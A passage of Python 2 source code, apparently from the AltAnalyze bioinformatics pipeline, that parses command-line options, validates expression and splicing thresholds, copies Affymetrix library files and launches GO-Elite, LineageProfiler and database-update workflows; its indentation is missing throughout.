if 'stats.' in input_exp_file:
markerFinder.filterDetectionPvalues(species,platform,fl,input_exp_file)
sys.exit()
else:
markerFinder.analyzeData(group_exp_file,species,platform,compendiumType,geneToReport=genesToReport,correlateAll=correlateAll,AdditionalParameters=fl,logTransform=logTransform)
try: fl.setVendor(manufacturer)
except Exception:
print '--vendor not indicated by user... assuming Affymetrix'
fl.setVendor('Affymetrix')
try: markerFinder.generateMarkerHeatMaps(fl,array_type,convertNonLogToLog=logTransform,Species=species)
except Exception: print traceback.format_exc()
print 'Cell/Tissue marker classification analysis finished';sys.exit()
if 'EnsMart' in ensembl_version:
UI.exportDBversion(ensembl_version)
annotation_found = verifyFile(input_annotation_file)
proceed = 'no'
if 'Official' not in update_method and denom_file_dir == None: ### If running GO-Elite independent of AltAnalyze (see below GO_Elite call)
try:
time_stamp = timestamp()
if len(cel_file_dir)>0:
if output_dir == None:
output_dir = cel_file_dir
print "Setting output directory to the input path:", output_dir
if output_dir == None and input_filtered_dir>0:
output_dir = input_filtered_dir
try:
if '/' == output_dir[-1] or '\\' in output_dir[-2]: null=[]
else: output_dir +='/'
except:
try: output_dir = export.findParentDir(input_file_dir)
except:
output_dir = input_fastq_dir
log_file = filepath(output_dir+'/AltAnalyze_report-'+time_stamp+'.log')
log_report = open(log_file,'w'); log_report.close()
sys.stdout = Logger('')
except Exception,e:
print traceback.format_exc()
print 'Please designate an output directory before proceeding (e.g., --output "C:\RNASeq)';sys.exit()
try: print string.join(arguments,' ')
except Exception: pass
if mappedExonAnalysis:
array_type = 'RNASeq' ### Although this is not the actual platform, the resulting data will be treated as RNA-Seq with parameters most suitable for arrays
if len(external_annotation_dir)>0:
run_from_scratch = 'Annotate External Results'
if channel_to_extract != None:
run_from_scratch = 'Process Feature Extraction files' ### Agilent Feature Extraction files as input for normalization
manufacturer = 'Agilent'
constitutive_source = 'Agilent'
expression_threshold = 'NA'
perform_alt_analysis = 'NA'
if len(input_filtered_dir)>0:
run_from_scratch ='Process AltAnalyze filtered'; proceed='yes'
if len(input_exp_file)>0:
run_from_scratch = 'Process Expression file'; proceed='yes'
input_exp_file = string.replace(input_exp_file,'\\','/') ### Windows convention is \ rather than /, but works with /
ief_list = string.split(input_exp_file,'/')
if len(output_dir)>0: parent_dir = output_dir
else: parent_dir = string.join(ief_list[:-1],'/')
exp_name = ief_list[-1]
if len(cel_file_dir)>0 or runKallisto == True:
# python AltAnalyze.py --species Mm --platform RNASeq --runKallisto yes --expname test
if exp_name == None:
print "No experiment name defined. Please sumbit a name (e.g., --expname CancerComp) before proceeding."; sys.exit()
else:
dataset_name = 'exp.'+exp_name+'.txt'; exp_file_dir = filepath(output_dir+'/ExpressionInput/'+dataset_name)
if runKallisto:
run_from_scratch == 'Process RNA-seq reads'
elif run_from_scratch!= 'Process Feature Extraction files':
run_from_scratch = 'Process CEL files'; proceed='yes'
if array_type == 'RNASeq': file_ext = '.BED'
else: file_ext = '.CEL'
try: cel_files,cel_files_fn = UI.identifyCELfiles(cel_file_dir,array_type,manufacturer)
except Exception,e:
print e
if mappedExonAnalysis: pass
else: print "No",file_ext,"files found in the directory:",cel_file_dir;sys.exit()
if array_type != 'RNASeq': cel_file_list_dir = UI.exportCELFileList(cel_files_fn,cel_file_dir)
if groups_file != None and comps_file != None:
try: export.copyFile(groups_file, string.replace(exp_file_dir,'exp.','groups.'))
except Exception: print 'Groups file already present in target location OR bad input path.'
try: export.copyFile(comps_file, string.replace(exp_file_dir,'exp.','comps.'))
except Exception: print 'Comparison file already present in target location OR bad input path.'
groups_file = string.replace(exp_file_dir,'exp.','groups.')
comps_file = string.replace(exp_file_dir,'exp.','comps.')
if verifyGroupFileFormat(groups_file) == False:
print "\nWarning! The format of your groups file is not correct. For details, see:\nhttp://altanalyze.readthedocs.io/en/latest/ManualGroupsCompsCreation\n"
sys.exit()
if array_type != 'RNASeq' and manufacturer!= 'Agilent':
"""Determine if Library and Annotations for the array exist, if not, download or prompt for selection"""
try:
### For the HGLUE and HJAY arrays, this step is critical in order to have the commond-line AltAnalyze downloadthe appropriate junction database (determined from specific_array_type)
specific_array_types,specific_array_type = UI.identifyArrayType(cel_files_fn)
num_array_types = len(specific_array_types)
except Exception:
null=[]; num_array_types=1; specific_array_type=None
if array_type == 'exon':
if species == 'Hs': specific_array_type = 'HuEx-1_0-st-v2'
if species == 'Mm': specific_array_type = 'MoEx-1_0-st-v2'
if species == 'Rn': specific_array_type = 'RaEx-1_0-st-v2'
elif array_type == 'gene':
if species == 'Hs': specific_array_type = 'HuGene-1_0-st-v1'
if species == 'Mm': specific_array_type = 'MoGene-1_0-st-v1'
if species == 'Rn': specific_array_type = 'RaGene-1_0-st-v1'
elif array_type == 'AltMouse': specific_array_type = 'altMouseA'
"""
elif array_type == 'junction':
if species == 'Mm': specific_array_type = 'MJAY'
if species == 'Hs': specific_array_type = 'HJAY'
"""
supproted_array_db = UI.importSupportedArrayInfo()
if specific_array_type in supproted_array_db and input_cdf_file == None and input_annotation_file == None:
sa = supproted_array_db[specific_array_type]; species = sa.Species(); array_type = sa.ArrayType()
input_cdf_file, input_annotation_file, bgp_file, clf_file = UI.getAffyFilesRemote(specific_array_type,array_type,species)
else: array_type = "3'array"
cdf_found = verifyFile(input_cdf_file)
annotation_found = verifyFile(input_annotation_file)
if input_cdf_file == None:
print [specific_array_type], 'not currently supported... Please provide CDF to AltAnalyze (commandline or GUI) or manually add to AltDatabase/affymetrix/LibraryFiles'; sys.exit()
if cdf_found != "found":
### Copy valid Library files to a local AltAnalyze database directory
input_cdf_file_lower = string.lower(input_cdf_file)
if array_type == "3'array":
if '.cdf' in input_cdf_file_lower:
clf_file='';bgp_file=''; assinged = 'yes'
###Thus the CDF or PDF file was confirmed, so copy it over to AltDatabase
icf_list = string.split(input_cdf_file,'/'); cdf_short = icf_list[-1]
destination_parent = 'AltDatabase/affymetrix/LibraryFiles/'
destination_parent = osfilepath(destination_parent+cdf_short)
info_list = input_cdf_file,destination_parent; UI.StatusWindow(info_list,'copy')
else: print "Valid CDF file not found. Exiting program.";sys.exit()
else:
if '.pgf' in input_cdf_file_lower:
###Check to see if the clf and bgp files are present in this directory
icf_list = string.split(input_cdf_file,'/'); parent_dir = string.join(icf_list[:-1],'/'); cdf_short = icf_list[-1]
clf_short = string.replace(cdf_short,'.pgf','.clf')
kil_short = string.replace(cdf_short,'.pgf','.kil') ### Only applies to the Glue array
if array_type == 'exon' or array_type == 'junction': bgp_short = string.replace(cdf_short,'.pgf','.antigenomic.bgp')
else: bgp_short = string.replace(cdf_short,'.pgf','.bgp')
dir_list = read_directory(parent_dir)
if clf_short in dir_list and bgp_short in dir_list:
pgf_file = input_cdf_file
clf_file = string.replace(pgf_file,'.pgf','.clf')
kil_file = string.replace(pgf_file,'.pgf','.kil') ### Only applies to the Glue array
if array_type == 'exon' or array_type == 'junction': bgp_file = string.replace(pgf_file,'.pgf','.antigenomic.bgp')
else: bgp_file = string.replace(pgf_file,'.pgf','.bgp')
assinged = 'yes'
###Thus the CDF or PDF file was confirmed, so copy it over to AltDatabase
destination_parent = 'AltDatabase/affymetrix/LibraryFiles/'
info_list = input_cdf_file,osfilepath(destination_parent+cdf_short); UI.StatusWindow(info_list,'copy')
info_list = clf_file,osfilepath(destination_parent+clf_short); UI.StatusWindow(info_list,'copy')
info_list = bgp_file,osfilepath(destination_parent+bgp_short); UI.StatusWindow(info_list,'copy')
if 'Glue' in pgf_file:
info_list = kil_file,osfilepath(destination_parent+kil_short); UI.StatusWindow(info_list,'copy')
if annotation_found != "found" and update_dbs == 'no' and array_type != 'RNASeq' and denom_file_dir == None and manufacturer != 'Agilent':
### Copy valid Annotation files to a local AltAnalyze database directory
try:
input_annotation_lower = string.lower(input_annotation_file)
if '.csv' in input_annotation_lower:
assinged = 'yes'
###Thus the CDF or PDF file was confirmed, so copy it over to AltDatabase
icf_list = string.split(input_annotation_file,'/'); csv_short = icf_list[-1]
destination_parent = 'AltDatabase/affymetrix/'+species+'/'
info_list = input_annotation_file,filepath(destination_parent+csv_short); UI.StatusWindow(info_list,'copy')
except Exception: print "No Affymetrix annotation file provided. AltAnalyze will use any .csv annotations files in AltDatabase/Affymetrix/"+species
if array_type == 'PSI':
array_type = "3'array"
vendor = 'PSI'
if 'Official' in update_method and species != None:
proceed = 'yes'
elif array_type != None and species != None:
expr_defaults, alt_exon_defaults, functional_analysis_defaults, goelite_defaults = UI.importDefaults(array_type,species)
ge_fold_cutoffs, ge_pvalue_cutoffs, ge_ptype, filter_method, z_threshold, p_val_threshold, change_threshold, ORA_algorithm, resources_to_analyze, goelite_permutations, mod, returnPathways, NA = goelite_defaults
use_direct_domain_alignments_only,microRNA_prediction_method = functional_analysis_defaults
analysis_method, additional_algorithms, filter_probeset_types, analyze_all_conditions, p_threshold, alt_exon_fold_variable, additional_score, permute_p_threshold, gene_expression_cutoff, remove_intronic_junctions, perform_permutation_analysis, export_NI_values, run_MiDAS, calculate_normIntensity_p, filter_for_AS = alt_exon_defaults
dabg_p, rpkm_threshold, gene_exp_threshold, exon_exp_threshold, exon_rpkm_threshold, expression_threshold, perform_alt_analysis, analyze_as_groups, expression_data_format, normalize_feature_exp, normalize_gene_data, avg_all_for_ss, include_raw_data, probability_statistic, FDR_statistic, batch_effects, marker_finder, visualize_qc_results, run_lineage_profiler, null = expr_defaults
elif denom_file_dir != None and species != None:
proceed = 'yes' ### Only run GO-Elite
expr_defaults, alt_exon_defaults, functional_analysis_defaults, goelite_defaults = UI.importDefaults('RNASeq',species) ### platform not relevant
ge_fold_cutoffs, ge_pvalue_cutoffs, ge_ptype, filter_method, z_threshold, p_val_threshold, change_threshold, ORA_algorithm, resources_to_analyze, goelite_permutations, mod, returnPathways, NA = goelite_defaults
else:
print 'No species defined. Please include the species code (e.g., "--species Hs") and array type (e.g., "--arraytype exon") before proceeding.'
print '\nAlso check the printed arguments above to see if there are formatting errors, such as bad quotes.'; sys.exit()
array_type_original = array_type
#if array_type == 'gene': array_type = "3'array"
for opt, arg in options:
if opt == '--runGOElite': run_GOElite=arg
elif opt == '--outputQCPlots': visualize_qc_results=arg
elif opt == '--runLineageProfiler' or opt == '--cellHarmony' or opt == '--cellHarmonyMerge':
if string.lower(arg) == 'yes' or string.lower(arg) == 'true':
run_lineage_profiler = 'yes'
elif opt == '--elitepermut': goelite_permutations=arg
elif opt == '--method': filter_method=arg
elif opt == '--zscore': z_threshold=arg
elif opt == '--elitepval': p_val_threshold=arg
elif opt == '--num': change_threshold=arg
elif opt == '--dataToAnalyze': resources_to_analyze=arg
elif opt == '--GEelitepval': ge_pvalue_cutoffs=arg
elif opt == '--GEelitefold': ge_fold_cutoffs=arg
elif opt == '--GEeliteptype': ge_ptype=arg
elif opt == '--ORAstat': ORA_algorithm=arg
elif opt == '--returnPathways': returnPathways=arg
elif opt == '--FDR': FDR_statistic=arg
elif opt == '--dabgp': dabg_p=arg
elif opt == '--rawexp': expression_threshold=arg
elif opt == '--geneRPKM': rpkm_threshold=arg
elif opt == '--exonRPKM': exon_rpkm_threshold=arg
elif opt == '--geneExp': gene_exp_threshold=arg
elif opt == '--exonExp': exon_exp_threshold=arg
elif opt == '--groupStat': probability_statistic=arg
elif opt == '--avgallss': avg_all_for_ss=arg
elif opt == '--logexp': expression_data_format=arg
elif opt == '--inclraw': include_raw_data=arg
elif opt == '--combat': batch_effects=arg
elif opt == '--runalt': perform_alt_analysis=arg
elif opt == '--altmethod': analysis_method=arg
elif opt == '--altp': p_threshold=arg
elif opt == '--probetype': filter_probeset_types=arg
elif opt == '--altscore': alt_exon_fold_variable=arg
elif opt == '--GEcutoff': gene_expression_cutoff=arg
elif opt == '--removeIntronOnlyJunctions': remove_intronic_junctions=arg
elif opt == '--normCounts': normalize_feature_exp=arg
elif opt == '--normMatrix': normalize_gene_data=arg
elif opt == '--altpermutep': permute_p_threshold=arg
elif opt == '--altpermute': perform_permutation_analysis=arg
elif opt == '--exportnormexp': export_NI_values=arg
elif opt == '--buildExonExportFile': build_exon_bedfile = 'yes'
elif opt == '--runMarkerFinder': marker_finder = arg
elif opt == '--calcNIp': calculate_normIntensity_p=arg
elif opt == '--runMiDAS': run_MiDAS=arg
elif opt == '--analyzeAllGroups':
analyze_all_conditions=arg
if analyze_all_conditions == 'yes': analyze_all_conditions = 'all groups'
elif opt == '--GEcutoff': use_direct_domain_alignments_only=arg
elif opt == '--mirmethod': microRNA_prediction_method=arg
elif opt == '--ASfilter': filter_for_AS=arg
elif opt == '--noxhyb': xhyb_remove=arg
elif opt == '--returnAll': return_all=arg
elif opt == '--annotatedir': external_annotation_dir=arg
elif opt == '--additionalScore': additional_score=arg
elif opt == '--additionalAlgorithm': additional_algorithms=arg
elif opt == '--modelSize':
modelSize=arg
try: modelSize = int(modelSize)
except Exception: modelSize = None
elif opt == '--geneModel':
geneModel=arg # file location
if geneModel == 'no' or 'alse' in geneModel:
geneModel = False
elif opt == '--reference':
custom_reference = arg
if run_from_scratch == 'Process Feature Extraction files': ### Agilent Feature Extraction files as input for normalization
normalize_gene_data = 'quantile' ### required for Agilent
proceed = 'yes'
if returnPathways == 'no' or returnPathways == 'None':
returnPathways = None
if pipelineAnalysis == False:
proceed = 'yes'
if len(input_fastq_dir)>0:
proceed = 'yes'
run_from_scratch = 'Process RNA-seq reads'
fl = UI.ExpressionFileLocationData('','','',''); fl.setFeatureNormalization('none')
try: root_dir = root_dir
except: root_dir = output_dir
try: fl.setExpFile(expFile)
except Exception:
expFile = root_dir+'/ExpressionInput/exp.'+exp_name+'.txt'
fl.setExpFile(expFile)
fl.setArrayType(array_type)
fl.setOutputDir(root_dir)
fl.setMultiThreading(multiThreading)
exp_file_location_db={}; exp_file_location_db[exp_name]=fl
### Assign variables needed to run Kallisto from FASTQ files
if runKallisto and len(input_fastq_dir)==0:
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Mm --column_method hopach --rho 0.4 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 1 --excludeCellCycle strict --output /Users/saljh8/Desktop/Grimes/GEC14074 --expname test --fastq_dir /Users/saljh8/Desktop/Grimes/GEC14074
print 'Please include the flag "--fastq_dir" in the command-line arguments with an appropriate path';sys.exit()
elif len(input_fastq_dir)>0:
fl.setRunKallisto(input_fastq_dir)
fl.setArrayType("3'array")
array_type = "3'array"
if customFASTA!=None:
fl.setCustomFASTA(customFASTA)
if proceed == 'yes':
species_codes = UI.remoteSpeciesInfo()
### Update Ensembl Databases
if 'Official' in update_method:
file_location_defaults = UI.importDefaultFileLocations()
db_versions_vendors,db_versions = UI.remoteOnlineDatabaseVersions()
array_codes = UI.remoteArrayInfo()
UI.getOnlineDBConfig(file_location_defaults,'')
if len(species)==2:
species_names = UI.getSpeciesInfo()
species_full = species_names[species]
else: species_full = species
print 'Species name to update:',species_full
db_version_list=[]
for version in db_versions: db_version_list.append(version)
db_version_list.sort(); db_version_list.reverse(); select_version = db_version_list[0]
db_versions[select_version].sort()
print 'Ensembl version',ensembl_version
if ensembl_version != 'current':
if len(ensembl_version) < 4: ensembl_version = 'EnsMart'+ensembl_version
if ensembl_version not in db_versions:
try: UI.getOnlineEliteDatabase(file_location_defaults,ensembl_version,[species],'no',''); sys.exit()
except Exception:
### This is only for database that aren't officially released yet for prototyping
print ensembl_version, 'is not a valid version of Ensembl, while',select_version, 'is.'; sys.exit()
else: select_version = ensembl_version
### Export basic species information
sc = species; db_version = ensembl_version
if sc != None:
for ad in db_versions_vendors[db_version]:
if ad.SpeciesCodes() == species_full:
for array_system in array_codes:
ac = array_codes[array_system]
compatible_species = ac.SpeciesCodes()
if ac.Manufacturer() in ad.Manufacturer() and ('expression' in ac.ArrayName() or 'RNASeq' in ac.ArrayName() or 'RNA-seq' in ac.ArrayName()):
if sc not in compatible_species: compatible_species.append(sc)
ac.setSpeciesCodes(compatible_species)
UI.exportArrayInfo(array_codes)
if species_full not in db_versions[select_version]:
print db_versions[select_version]
print species_full, ': This species is not available for this version %s of the Official database.' % select_version
else:
update_goelite_resources = 'no' ### This is handled separately below
UI.getOnlineEliteDatabase(file_location_defaults,ensembl_version,[species],update_goelite_resources,'');
### Attempt to download additional Ontologies and GeneSets
if additional_resources[0] != None: ### Indicates that the user requested the download of addition GO-Elite resources
try:
from build_scripts import GeneSetDownloader
print 'Adding supplemental GeneSet and Ontology Collections'
if 'all' in additional_resources:
additionalResources = UI.importResourceList() ### Get's all additional possible resources
else: additionalResources = additional_resources
GeneSetDownloader.buildAccessoryPathwayDatabases([species],additionalResources,'yes')
print 'Finished adding additional analysis resources.'
except Exception:
print 'Download error encountered for additional Ontologies and GeneSets...\nplease try again later.'
status = UI.verifyLineageProfilerDatabases(species,'command-line')
if status == False:
print 'Please note: LineageProfiler not currently supported for this species...'
if array_type == 'junction' or array_type == 'RNASeq': ### Download junction databases
try: UI.checkForLocalArraySupport(species,array_type,specific_array_type,'command-line')
except Exception:
print 'Please install a valid gene database before proceeding.\n'
print 'For example: python AltAnalyze.py --species Hs --update Official --version EnsMart72';sys.exit()
status = UI.verifyLineageProfilerDatabases(species,'command-line')
print "Finished adding database"
sys.exit()
try:
#print ge_fold_cutoffs,ge_pvalue_cutoffs, change_threshold, resources_to_analyze, goelite_permutations, p_val_threshold, z_threshold
change_threshold = int(change_threshold)-1
goelite_permutations = int(goelite_permutations);change_threshold = change_threshold
p_val_threshold = float(p_val_threshold); z_threshold = float(z_threshold)
if ORA_algorithm == 'Fisher Exact Test':
goelite_permutations = 'FisherExactTest'
except Exception,e:
print e
print 'One of the GO-Elite input values is inapporpriate. Please review and correct.';sys.exit()
if run_GOElite == None or run_GOElite == 'no': goelite_permutations = 'NA' ### This haults GO-Elite from running
else:
if output_dir == None:
print "\nPlease specify an output directory using the flag --output"; sys.exit()
try: expression_threshold = float(expression_threshold)
except Exception: expression_threshold = 1
try: dabg_p = float(dabg_p)
except Exception: dabg_p = 1 ### Occurs for RNASeq
if microRNA_prediction_method == 'two or more': microRNA_prediction_method = 'multiple'
else: microRNA_prediction_method = 'any'
### Run GO-Elite directly from user supplied input and denominator ID folders (outside of the normal workflows)
if run_GOElite == 'yes' and pipelineAnalysis == False and '--runGOElite' in arguments:# and denom_file_dir != None:
#python AltAnalyze.py --input "/Users/nsalomonis/Desktop/Mm_sample/input_list_small" --runGOElite yes --denom "/Users/nsalomonis/Desktop/Mm_sample/denominator" --mod Ensembl --species Mm
"""if denom_file_dir == None:
print 'Please include a folder containing a valid denominator ID list for the input ID sets.'; sys.exit()"""
try:
if output_dir==None:
### Set output to the same directory or parent if none selected
i = -1 ### 1 directory up
output_dir = string.join(string.split(input_file_dir,'/')[:i],'/')
file_dirs = input_file_dir, denom_file_dir, output_dir
import GO_Elite
if ORA_algorithm == 'Fisher Exact Test':
goelite_permutations = 'FisherExactTest'
goelite_var = species,mod,goelite_permutations,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,returnPathways,file_dirs,''
GO_Elite.remoteAnalysis(goelite_var,'non-UI',Multi=mlp)
sys.exit()
except Exception:
print traceback.format_exc()
print "Unexpected error encountered. Please see log file."; sys.exit()
if run_lineage_profiler == 'yes':
status = UI.verifyLineageProfilerDatabases(species,'command-line')
if status == False:
print 'Please note: LineageProfiler not currently supported for this species...'
if run_lineage_profiler == 'yes' and input_file_dir != None and pipelineAnalysis == False and ('--runLineageProfiler' in arguments or '--cellHarmony' in arguments or '--cellHarmonyMerge' in arguments):
#python AltAnalyze.py --input "/Users/arrays/test.txt" --runLineageProfiler yes --vendor Affymetrix --platform "3'array" --species Mm --output "/Users/nsalomonis/Merrill"
#python AltAnalyze.py --input "/Users/qPCR/samples.txt" --runLineageProfiler yes --geneModel "/Users/qPCR/models.txt" --reference "Users/qPCR/reference_profiles.txt"
if array_type==None:
print "Please include a platform name (e.g., --platform RNASeq)";sys.exit()
if species==None:
print "Please include a species name (e.g., --species Hs)";sys.exit()
try:
status = UI.verifyLineageProfilerDatabases(species,'command-line')
except ValueError:
### Occurs due to if int(gene_database[-2:]) < 65: - ValueError: invalid literal for int() with base 10: ''
print '\nPlease install a valid gene database before proceeding.\n'
print 'For example: python AltAnalyze.py --species Hs --update Official --version EnsMart72\n';sys.exit()
if status == False:
print 'Please note: LineageProfiler not currently supported for this species...';sys.exit()
try:
FoldDiff=1.5
performDiffExp=True
pval = 0.05
adjp = True
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--fold': FoldDiff=float(arg)
elif opt == '--pval': pval = float(arg)
elif opt == '--adjp': adjp = arg
elif opt == '--performDiffExp': performDiffExp = arg
elif opt == '--centerMethod': CenterMethod = arg
elif opt == '--labels': labels = arg
elif opt == '--genes': genes = arg
elif opt == '--referenceFull': referenceFull = arg
fl = UI.ExpressionFileLocationData('','','','')
fl.setSpecies(species)
fl.setVendor(manufacturer)
fl.setPlatformType(array_type)
fl.setCompendiumType('protein_coding')
if '--cellHarmony' in arguments:
fl.setClassificationAnalysis('cellHarmony')
fl.setPearsonThreshold(PearsonThreshold)
fl.setReturnCentroids(returnCentroids)
fl.setPeformDiffExpAnalysis(performDiffExp)
fl.setUseAdjPvalue(adjp)
fl.setPvalThreshold(pval)
fl.setFoldCutoff(FoldDiff)
fl.setLabels(labels)
else:
fl.setClassificationAnalysis('LineageProfiler')
#fl.setCompendiumType('AltExon')
fl.setCompendiumPlatform(array_type)
try: expr_input_dir
except Exception: expr_input_dir = input_file_dir
if '--cellHarmonyMerge' in arguments:
ICGS_files=[]
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--input' or opt == '--i':
input_file = verifyPath(arg)
ICGS_files.append(input_file)
import LineageProfilerIterate
print 'center method =',CenterMethod
LineageProfilerIterate.createMetaICGSResults(ICGS_files,output_dir,CenterMethod=CenterMethod,species=species,PearsonThreshold=PearsonThreshold)
#except: LineageProfilerIterate.createMetaICGSResults(ICGS_files,output_dir,CenterMethod=CenterMethod)
sys.exit()
try: CenterMethod=CenterMethod
except: CenterMethod='community'
""" Only align sparse matrix files and skip other analyses """
if len(genes)>0 and ('h5' in custom_reference or 'mtx' in custom_reference):
fl.set_reference_exp_file(custom_reference)
custom_reference = genes
if referenceFull != None:
fl.set_reference_exp_file(referenceFull)
UI.remoteLP(fl, expr_input_dir, manufacturer, custom_reference, geneModel, None, modelSize=modelSize, CenterMethod=CenterMethod) #,display=display
#graphic_links = ExpressionBuilder.remoteLineageProfiler(fl,input_file_dir,array_type,species,manufacturer)
print_out = 'Alignments and images saved to the folder "DataPlots" in the input file folder.'
print print_out
except Exception:
print traceback.format_exc()
print_out = 'Analysis error occured...\nplease see warning printouts.'
print print_out
sys.exit()
if array_type == 'junction' or array_type == 'RNASeq': ### Download junction databases
try: UI.checkForLocalArraySupport(species,array_type,specific_array_type,'command-line')
except Exception:
print 'Please install a valid gene database before proceeding.\n'
print 'For example: python AltAnalyze.py --species Hs --update Official --version EnsMart72';sys.exit()
probeset_types = ['full','core','extended']
if return_all == 'yes': ### Perform no alternative exon filtering when annotating existing FIRMA or MADS results
dabg_p = 1; expression_threshold = 1; p_threshold = 1; alt_exon_fold_variable = 1
gene_expression_cutoff = 10000; filter_probeset_types = 'full'; exon_exp_threshold = 1; rpkm_threshold = 0
gene_exp_threshold = 1; exon_rpkm_threshold = 0
if array_type == 'RNASeq':
gene_exp_threshold = 0
else:
if array_type != "3'array":
try:
p_threshold = float(p_threshold); alt_exon_fold_variable = float(alt_exon_fold_variable)
expression_threshold = float(expression_threshold); gene_expression_cutoff = float(gene_expression_cutoff)
dabg_p = float(dabg_p); additional_score = float(additional_score)
gene_expression_cutoff = float(gene_expression_cutoff)
except Exception:
try: gene_expression_cutoff = float(gene_expression_cutoff)
except Exception: gene_expression_cutoff = 0
try: rpkm_threshold = float(rpkm_threshold)
except Exception: rpkm_threshold = -1
try: exon_exp_threshold = float(exon_exp_threshold)
except Exception: exon_exp_threshold = 0
try: gene_exp_threshold = float(gene_exp_threshold)
except Exception: gene_exp_threshold = 0
try: exon_rpkm_threshold = float(exon_rpkm_threshold)
except Exception: exon_rpkm_threshold = 0
if filter_probeset_types not in probeset_types and array_type == 'exon':
print "Invalid probeset-type entered:",filter_probeset_types,'. Must be "full", "extended" or "core"'; sys.exit()
elif array_type == 'gene' and filter_probeset_types == 'NA': filter_probeset_types = 'core'
if dabg_p > 1 or dabg_p <= 0:
print "Invalid DABG p-value entered:",dabg_p,'. Must be > 0 and <= 1'; sys.exit()
if expression_threshold <1:
print "Invalid expression threshold entered:",expression_threshold,'. Must be > 1'; sys.exit()
if p_threshold > 1 or p_threshold <= 0:
print "Invalid alternative exon p-value entered:",p_threshold,'. Must be > 0 and <= 1'; sys.exit()
if alt_exon_fold_variable < 1 and analysis_method != 'ASPIRE' and analysis_method != 'MultiPath-PSI':
print "Invalid alternative exon threshold entered:",alt_exon_fold_variable,'. Must be > 1'; sys.exit()
if gene_expression_cutoff < 1:
print "Invalid gene expression threshold entered:",gene_expression_cutoff,'. Must be > 1'; sys.exit()
if additional_score < 1:
print "Invalid additional score threshold entered:",additional_score,'. Must be > 1'; sys.exit()
if array_type == 'RNASeq':
if rpkm_threshold < 0:
print "Invalid gene RPKM threshold entered:",rpkm_threshold,'. Must be >= 0'; sys.exit()
if exon_exp_threshold < 1:
print "Invalid exon expression threshold entered:",exon_exp_threshold,'. Must be > 1'; sys.exit()
if exon_rpkm_threshold < 0:
print "Invalid exon RPKM threshold entered:",exon_rpkm_threshold,'. Must be >= 0'; sys.exit()
if gene_exp_threshold < 1:
print "Invalid gene expression threshold entered:",gene_exp_threshold,'. Must be > 1'; sys.exit()
if 'FIRMA' in additional_algorithms and array_type == 'RNASeq':
print 'FIRMA is not an available option for RNASeq... Changing this to splicing-index.'
additional_algorithms = 'splicing-index'
additional_algorithms = UI.AdditionalAlgorithms(additional_algorithms); additional_algorithms.setScore(additional_score)
if array_type == 'RNASeq':
try:
if 'CEL' in run_from_scratch: run_from_scratch = 'Process RNA-seq reads'
if build_exon_bedfile == 'yes': run_from_scratch = 'buildExonExportFiles'
manufacturer = 'RNASeq'
except Exception:
### When technically 3'array format
array_type = "3'array"
if run_from_scratch == 'Process AltAnalyze filtered': expression_data_format = 'log' ### This is switched to log no matter what, after initial import and analysis of CEL or BED files
### These variables are modified from the defaults in the module UI as below
excludeNonExpExons = True
if avg_all_for_ss == 'yes': avg_all_for_ss = 'yes'
elif 'all exon aligning' in avg_all_for_ss or 'known exons' in avg_all_for_ss or 'expressed exons' in avg_all_for_ss:
if 'known exons' in avg_all_for_ss and array_type == 'RNASeq': excludeNonExpExons = False
avg_all_for_ss = 'yes'
else: avg_all_for_ss = 'no'
if run_MiDAS == 'NA': run_MiDAS = 'no'
if perform_alt_analysis == 'yes': perform_alt_analysis = 'yes'
elif perform_alt_analysis == 'expression': perform_alt_analysis = 'expression'
elif perform_alt_analysis == 'just expression': perform_alt_analysis = 'expression'
elif perform_alt_analysis == 'no': perform_alt_analysis = 'expression'
elif platform != "3'array": perform_alt_analysis = 'both'
if systemToUse != None: array_type = systemToUse
try: permute_p_threshold = float(permute_p_threshold)
except Exception: permute_p_threshold = permute_p_threshold
### Store variables for AltAnalyzeMain
expr_var = species,array_type,manufacturer,constitutive_source,dabg_p,expression_threshold,avg_all_for_ss,expression_data_format,include_raw_data,run_from_scratch,perform_alt_analysis
alt_var = analysis_method,p_threshold,filter_probeset_types,alt_exon_fold_variable,gene_expression_cutoff,remove_intronic_junctions,permute_p_threshold,perform_permutation_analysis, export_NI_values, analyze_all_conditions
additional_var = calculate_normIntensity_p, run_MiDAS, use_direct_domain_alignments_only, microRNA_prediction_method, filter_for_AS, additional_algorithms
goelite_var = ge_fold_cutoffs,ge_pvalue_cutoffs,ge_ptype,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,goelite_permutations,mod,returnPathways
if run_from_scratch == 'buildExonExportFiles':
fl = UI.ExpressionFileLocationData('','','',''); fl.setExonBedBuildStatus('yes'); fl.setFeatureNormalization('none')
fl.setCELFileDir(cel_file_dir); fl.setArrayType(array_type); fl.setOutputDir(output_dir)
fl.setMultiThreading(multiThreading)
exp_file_location_db={}; exp_file_location_db[dataset_name]=fl; parent_dir = output_dir
perform_alt_analysis = 'expression'
if run_from_scratch == 'Process Expression file':
if len(input_exp_file)>0:
if groups_file != None and comps_file != None:
if 'exp.' in input_exp_file: new_exp_file = input_exp_file
else:
new_exp_file = export.findParentDir(input_exp_file)+'exp.'+export.findFilename(input_exp_file)
if 'ExpressionInput' not in new_exp_file:
### This expression file is not currently used (could make it the default after copying to this location)
if output_dir[-1] != '/' and output_dir[-1] != '\\':
output_dir += '/'
new_exp_file = output_dir+'ExpressionInput/'+export.findFilename(new_exp_file)
try: export.copyFile(input_exp_file, new_exp_file)
except Exception: print 'Expression file already present in target location.'
try: export.copyFile(groups_file, string.replace(new_exp_file,'exp.','groups.'))
except Exception: print 'Groups file already present in target location OR bad input path.'
try: export.copyFile(comps_file, string.replace(new_exp_file,'exp.','comps.'))
except Exception: print 'Comparison file already present in target location OR bad input path.'
groups_file = string.replace(new_exp_file,'exp.','groups.')
comps_file = string.replace(new_exp_file,'exp.','comps.')
input_exp_file = new_exp_file
if verifyGroupFileFormat(groups_file) == False:
print "\nWarning! The format of your groups file is not correct. For details, see:\nhttp://altanalyze.readthedocs.io/en/latest/ManualGroupsCompsCreation\n"
sys.exit()
try:
cel_files, array_linker_db = ExpressionBuilder.getArrayHeaders(input_exp_file)
if len(input_stats_file)>1: ###Make sure the files have the same arrays and order first
cel_files2, array_linker_db2 = ExpressionBuilder.getArrayHeaders(input_stats_file)
if cel_files2 != cel_files:
